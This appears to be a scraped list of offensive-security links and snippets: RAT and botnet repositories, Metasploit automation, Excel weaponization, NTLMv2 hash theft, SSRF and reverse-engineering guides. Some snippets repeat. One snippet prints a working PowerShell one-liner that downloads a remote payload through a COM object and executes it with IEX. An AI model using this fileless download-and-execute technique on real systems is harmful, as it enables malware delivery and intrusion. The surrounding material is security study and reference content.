GitHub - Pure-L0G1C/Loki: Remote Access Tool/Botnet
https://github.com/Pure-L0G1C/Loki
https://github.com/Pure-L0G1C/Loki
GitHub
GitHub - Bitwise-01/Loki: Remote Access Tool
Remote Access Tool. Contribute to Bitwise-01/Loki development by creating an account on GitHub.
Automation exploit with mad-metasploit(db_autopwn module) - HAHWUL :: 하훌
https://www.hahwul.com/2019/03/automation-exploit-with-mad-metasploit.html
https://www.hahwul.com/2019/03/automation-exploit-with-mad-metasploit.html
Hahwul
Automation exploit with mad-metasploit(db_autopwn module)
Remote Code Execution — Gaining Domain Admin privileges due to a typo
https://medium.com/@DanielC7/remote-code-execution-gaining-domain-admin-privileges-due-to-a-typo-dbf8773df767
https://medium.com/@DanielC7/remote-code-execution-gaining-domain-admin-privileges-due-to-a-typo-dbf8773df767
Medium
Remote Code Execution — Gaining Domain Admin due to a typo
CVE-2018–9022
MS Excel Weaponization Techniques – Bank Security – Medium
https://medium.com/@Bank_Security/ms-excel-weaponization-techniques-79ac51610bf5
https://medium.com/@Bank_Security/ms-excel-weaponization-techniques-79ac51610bf5
Medium
MS Excel Weaponization Techniques
Different methods to run a command line via Excel file in order to spawn a Meterpreter reverse shell.
Today's Burp Suite release (2.0.18) includes a major iteration of the new crawler algorithm, based on real-world feedback. We're getting closer to Burp Suite 2.0 coming out of beta.
https://portswigger.net
https://portswigger.net
portswigger.net
Web Application Security, Testing, & Scanning - PortSwigger
PortSwigger offers tools for web application security, testing, & scanning. Choose from a range of security tools, & identify the very latest vulnerabilities.
Introduction to File Format Fuzzing & Exploitation – Daniel C – Medium
https://medium.com/@DanielC7/introduction-to-file-format-fuzzing-exploitation-922143ab2ab3
https://medium.com/@DanielC7/introduction-to-file-format-fuzzing-exploitation-922143ab2ab3
Medium
Introduction to File Format Fuzzing & Exploitation
This post will explain the process of finding and exploiting a previously unknown vulnerability in a real-world piece of software to…
Mobile Security class: https://t.co/TAAnBMCBqB! They are not perfect, but students learned how to reverse apps, find&exploit real-world bugs, reason about threat modelling / system security, etc.
Preview Pane: Malware launches in preview without opening MS Word doc
https://www.bromium.com/new-malware-launches-in-preview-pane
https://www.bromium.com/new-malware-launches-in-preview-pane
Powershell + COM fileless download exec alternative:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81
FE221")); $o.Open("GET", "https://t.co/qiHWmEcBZ5", $False); $o.Send(); IEX $o.responseText;
You can even use response headers to fetch your payload instead since the object support the getResponseHeader(string) method.
And set the proxy using setProxy() method.
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81
FE221")); $o.Open("GET", "https://t.co/qiHWmEcBZ5", $False); $o.Send(); IEX $o.responseText;
You can even use response headers to fetch your payload instead since the object support the getResponseHeader(string) method.
And set the proxy using setProxy() method.
Creating a Simple Free Malware Analysis Environment - MalwareTech
https://www.malwaretech.com/2017/11/creating-a-simple-free-malware-analysis-environment.html
https://www.malwaretech.com/2017/11/creating-a-simple-free-malware-analysis-environment.html
Malwaretech
Creating a Simple Free Malware Analysis Environment
Computer Requirements:
A CPU with AMD-V or Intel VT-x support (pretty much any modern CPU).
4 GB RAM (more is better).
Make sure Virtualization (AMD-V or Intel VT-x) is enabled in the BIOS. To do this, you’ll need to google “enable virtualization”…
A CPU with AMD-V or Intel VT-x support (pretty much any modern CPU).
4 GB RAM (more is better).
Make sure Virtualization (AMD-V or Intel VT-x) is enabled in the BIOS. To do this, you’ll need to google “enable virtualization”…
Add Drupal SA-CORE-2019-003 (CVE-2019-6340) · Issue #11481 · rapid7/metasploit-framework · GitHub
https://github.com/rapid7/metasploit-framework/pull/11481#issuecomment-469951674
https://github.com/rapid7/metasploit-framework/pull/11481#issuecomment-469951674
GitHub
Add Drupal SA-CORE-2019-003 (CVE-2019-6340) by rotemreiss · Pull Request #11481 · rapid7/metasploit-framework
Add new exploit for Drupal SA-CORE-2019-003.
This is my first Metasploit exploit so be gentle with me ;)
#7108, #9876
This is my first Metasploit exploit so be gentle with me ;)
#7108, #9876
An Hour with Ghidra : The Good and The Ugly
http://blog.fadyothman.com/an-hour-with-ghidra-the-good-and-the-ugly/
http://blog.fadyothman.com/an-hour-with-ghidra-the-good-and-the-ugly/
Fady's Technical Blog
An Hour with Ghidra : The Good and The Ugly
So, the NSA decided to release their reverse engineering tool named Ghidra, I
did have some time to play with it, and to be honest I was really impressed it's
an awesome tool, however there are some problems that I encountered when using
the tool.
The Good…
did have some time to play with it, and to be honest I was really impressed it's
an awesome tool, however there are some problems that I encountered when using
the tool.
The Good…
Server Side Request Forgery SSRF Types And Ways To Exploit It:-
Part 1:-
https://t.co/Iv2NkSLDYB
Part 2:-
https://t.co/p7rVZYCZkL
Part 1:-
https://t.co/Iv2NkSLDYB
Part 2:-
https://t.co/p7rVZYCZkL
HackersOnlineClub
Server Side Request Forgery SSRF Types And Ways To Exploit it (Part-1) - HackersOnlineClub
In this tutorial we will learn about SSRF and its Types. What is Server Side Request Forgery (SSRF)? Server Side Request Forgery (SSRF) refers...
Released a short introductory/quickstart tutorial for Ghidra: Solving a simple crackme. https://t.co/1cRlJi1i21
YouTube
Ghidra quickstart & tutorial: Solving a simple crackme
In this introduction to Ghidra we will solve a simple crackme - without reading any assembly! Twitter: https://twitter.com/ghidraninja Links from the video: ...
NMAP Tips: RTFM?
https://blog.zsec.uk/nmap-rtfm/
https://blog.zsec.uk/nmap-rtfm/
ZephrSec - Adventures In Information Security
NMAP Tips: RTFM?
NMAP TL;DR
It's a tool used for portscanning and this post will explore some of the common
and useful flags that can be used while scanning to pick up usful information
about targets.
What Is NMAP?
Nmap or Network mapper is an open source tool for network…
It's a tool used for portscanning and this post will explore some of the common
and useful flags that can be used while scanning to pick up usful information
about targets.
What Is NMAP?
Nmap or Network mapper is an open source tool for network…
Extracting Android KeyStores from apps – ceres-c
http://ceres-c.it/frida-android-keystore/
http://ceres-c.it/frida-android-keystore/
How to steal NTLMv2 hashes using file download vulnerability in web application | Start With Linux | Mannu Linux
http://www.mannulinux.org/2018/12/how-to-steal-ntlmv2-hashes-using-file.html?m=1
http://www.mannulinux.org/2018/12/how-to-steal-ntlmv2-hashes-using-file.html?m=1
www.mannulinux.org
How to steal NTLMv2 hashes using file download vulnerability in web application
Learn Basic Concepts of Linux. Best site to learn Linux from beginner to Advanced.
awesome-windows-kernel-security-development/README.md at master · ExpLife0011/awesome-windows-kernel-security-development · GitHub
https://github.com/ExpLife0011/awesome-windows-kernel-security-development/blob/master/README.md
https://github.com/ExpLife0011/awesome-windows-kernel-security-development/blob/master/README.md
GitHub
awesome-windows-kernel-security-development/README.md at master · ExpLife0011/awesome-windows-kernel-security-development
windows kernel security development. Contribute to ExpLife0011/awesome-windows-kernel-security-development development by creating an account on GitHub.
GitHub - skelsec/pypykatz_agent_dn: Pypykatz agent implemented in .NET
https://github.com/skelsec/pypykatz_agent_dn
https://github.com/skelsec/pypykatz_agent_dn
GitHub
skelsec/pypykatz_agent_dn
Pypykatz agent implemented in .NET. Contribute to skelsec/pypykatz_agent_dn development by creating an account on GitHub.